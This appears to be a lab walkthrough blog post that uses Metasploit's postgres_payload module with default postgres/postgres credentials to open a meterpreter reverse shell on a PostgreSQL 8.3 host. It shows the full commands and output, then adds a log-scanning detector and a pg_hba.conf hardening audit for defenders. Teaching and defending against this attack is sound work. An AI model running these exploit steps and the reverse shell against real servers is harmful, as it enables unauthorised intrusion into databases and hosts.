Metasploit in Practice: PostgreSQL Code Execution
2019-07-14
DreamsonMa
PostgreSQL introduction
PostgreSQL is an object-relational database management system (ORDBMS) based on POSTGRES version 4.2, which was developed in the computer science department of the University of California, Berkeley, and has since been renamed PostgreSQL. PostgreSQL supports most of the SQL standard and offers many other modern features: complex queries, foreign keys, triggers, views, transactional integrity, and MVCC. PostgreSQL can also be extended in many ways, for example by adding new data types, functions, operators, aggregate functions, and index methods. PostgreSQL may be used, modified, and distributed free of charge, whether for private, commercial, or academic purposes. https://www.postgresql.org/
Probing the target PostgreSQL
Use nmap -sV -p 5432 <IP address> to probe the target's PostgreSQL version.
➜ ~ nmap -sV 10.0.2.5 | grep sql
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
Exploiting PostgreSQL code execution
Use the PostgreSQL code-execution module in msf to obtain a reverse shell. The module authenticates with the USERNAME/PASSWORD options (shown below, defaulting to postgres/postgres), so it relies on weak or default database credentials.
1. Start the msfconsole console
➜ ~ msfconsole
[-] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
https://metasploit.com
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
2. Search for PostgreSQL exploit modules
msf5 > search postgresql
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_dbname_flag_injection normal Yes PostgreSQL Database Name Command Line Flag Injection
auxiliary/scanner/postgres/postgres_login normal Yes PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version normal Yes PostgreSQL Version Probe
auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL
exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution
exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution
exploit/windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution
post/linux/gather/enum_users_history normal No Linux Gather User History
3. Use exploit/linux/postgres/postgres_payload
msf5 > use exploit/linux/postgres/postgres_payload
msf5 exploit(linux/postgres/postgres_payload) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
4. Choose a payload
msf5 exploit(linux/postgres/postgres_payload) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
generic/custom normal No Custom Payload
generic/debug_trap normal No Generic x86 Debug Trap
generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal No Generic x86 Tight Loop
linux/x86/chmod normal No Linux Chmod
linux/x86/exec normal No Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
linux/x86/read_file normal No Linux Read File
linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/postgres/postgres_payload) > set lhost 10.0.2.12
lhost => 10.0.2.12
5. Check the option settings
msf5 exploit(linux/postgres/postgres_payload) > show options
Module options (exploit/linux/postgres/postgres_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 5432 yes The target port
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
6. Launch the exploit
msf5 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 10.0.2.12:4444
[*] 10.0.2.5:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/WaGyEMSt.so, should be cleaned up automatically
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35547) at 2019-07-14 01:28:44 -0400
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > shell
Process 5163 created.
Channel 1 created.
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
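From the defender's side, the run above leaves a trace that a statement log can catch: a native library is written to /tmp and then loaded into the server. The following Python scanner is an added example, not part of the original post or of Metasploit; it reads constructed PostgreSQL log lines (assuming log_statement = 'all' and the log_line_prefix given in the comment) and flags statements that load a C function from an explicit absolute path or export a large object into a world-writable directory. The exact SQL in the sample is an assumption about how the module works; the page only shows the "Uploaded as /tmp/...so" line.

```python
import re

# Constructed PostgreSQL server log lines (log_statement = 'all',
# log_line_prefix = '%m [%p] %u@%d '). The first four imitate how the
# Metasploit postgres_payload module loads its payload (write a shared
# object to /tmp, register it with CREATE FUNCTION ... LANGUAGE C, call it);
# the page only shows the "Uploaded as /tmp/...so" line, so the statement
# text is an assumption. The last two lines are benign activity.
SAMPLE_LOG = """\
2019-07-14 01:28:40 EDT [5160] postgres@template1 LOG:  statement: SELECT version()
2019-07-14 01:28:41 EDT [5160] postgres@template1 LOG:  statement: SELECT lo_export(16425, '/tmp/WaGyEMSt.so')
2019-07-14 01:28:42 EDT [5160] postgres@template1 LOG:  statement: CREATE OR REPLACE FUNCTION pg_temp.x() RETURNS void AS '/tmp/WaGyEMSt.so', 'x' LANGUAGE C STRICT
2019-07-14 01:28:43 EDT [5160] postgres@template1 LOG:  statement: SELECT pg_temp.x()
2019-07-14 01:30:00 EDT [5171] app@appdb LOG:  statement: CREATE FUNCTION add_one(int) RETURNS int AS '$libdir/add_one', 'add_one' LANGUAGE C STRICT
2019-07-14 01:30:05 EDT [5171] app@appdb LOG:  statement: SELECT id FROM customers WHERE id = 42
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@ ]+)@(?P<db>\S+) "
                     r"LOG:\s+statement: (?P<sql>.*)$")
# CREATE [OR REPLACE] FUNCTION ... AS '<library>'[, '<symbol>'] LANGUAGE C
C_FUNC_RE = re.compile(r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*?\bAS\s+'(?P<lib>[^']+)'"
                       r".*?\bLANGUAGE\s+C\b", re.IGNORECASE | re.DOTALL)
# lo_export(<oid>, '<path>') writes a server-side file as the postgres OS user
LO_EXPORT_RE = re.compile(r"\blo_export\s*\([^,]+,\s*'(?P<path>[^']+)'", re.IGNORECASE)
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")


def scan_log(text: str) -> list:
    """One finding per statement that loads native code from an explicit
    absolute path (legitimate extensions live under $libdir or are resolved
    by bare name) or writes a large object into a world-writable directory."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        sql, reason = m.group("sql"), None
        cf = C_FUNC_RE.search(sql)
        if cf and cf.group("lib").startswith("/"):
            reason = f"C function loaded from {cf.group('lib')}"
        lo = LO_EXPORT_RE.search(sql)
        if lo and lo.group("path").startswith(WORLD_WRITABLE):
            reason = f"large object exported to {lo.group('path')}"
        if reason:
            findings.append({"ts": m.group("ts"), "pid": int(m.group("pid")),
                             "user": m.group("user"), "db": m.group("db"), "reason": reason})
    return findings
```

Each finding carries the backend pid, role and database, which is what you need to join the log against pg_stat_activity or the connection log line that shows the client address.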
Privilege escalation
Defense and remediation
Defense: block PostgreSQL connections from arbitrary IP addresses
Remediation: upgrade the version and harden the configuration
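To make the "block arbitrary IPs" advice concrete, here is an added Python example (not from the original post) that audits a pg_hba.conf: a constructed weak file mirroring the setup on the page (the postgres superuser reachable from any address) is checked next to a constructed hardened version. The app role, the appdb database and the 10.0.2.0/24 application network are assumptions for the example.

```python
import ipaddress

# Constructed pg_hba.conf files. WEAK mirrors the situation on the page
# (the postgres superuser reachable from any address); HARDENED is one way
# to apply the "block arbitrary IPs" advice. The app role, appdb database
# and 10.0.2.0/24 application network are assumptions for this example.
WEAK_HBA = """\
# TYPE  DATABASE  USER      CIDR-ADDRESS    METHOD
local   all       postgres                  trust
host    all       all       0.0.0.0/0       md5
host    all       all       ::/0            md5
"""
HARDENED_HBA = """\
# TYPE  DATABASE  USER      CIDR-ADDRESS    METHOD
local   all       postgres                  peer
host    appdb     app       10.0.2.0/24     scram-sha-256
host    all       postgres  127.0.0.1/32    scram-sha-256
"""


def parse_hba(text: str) -> list:
    """Parse the CIDR form of pg_hba.conf (separate IP/netmask columns not handled)."""
    rules = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()   # drop comments and blank lines
        if not fields:
            continue
        if fields[0] == "local":                 # Unix-socket rule has no address column
            net, method = None, fields[3]
        else:
            net, method = ipaddress.ip_network(fields[3], strict=False), fields[4]
        rules.append({"type": fields[0], "db": fields[1], "user": fields[2],
                      "net": net, "method": method})
    return rules


def audit_hba(text: str) -> list:
    """Flag rules that admit any address, expose a superuser over the network,
    or skip / send in cleartext the password exchange."""
    findings = []
    for r in parse_hba(text):
        net = "" if r["net"] is None else str(r["net"])
        where = " ".join(filter(None, (r["type"], r["db"], r["user"], net, r["method"])))
        if r["method"] in ("trust", "password"):
            findings.append(f"{where}: method '{r['method']}' skips or cleartexts the password")
        if r["net"] is None:
            continue
        if r["net"].prefixlen == 0:
            findings.append(f"{where}: accepts connections from any address")
        elif r["user"] in ("all", "postgres") and not r["net"].is_loopback:
            findings.append(f"{where}: superuser reachable from the network")
    return findings
```

The password itself is outside what pg_hba.conf controls: the default postgres/postgres credential used by the module above still has to be changed separately.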
Recommended roundup post: Exploitation techniques roundup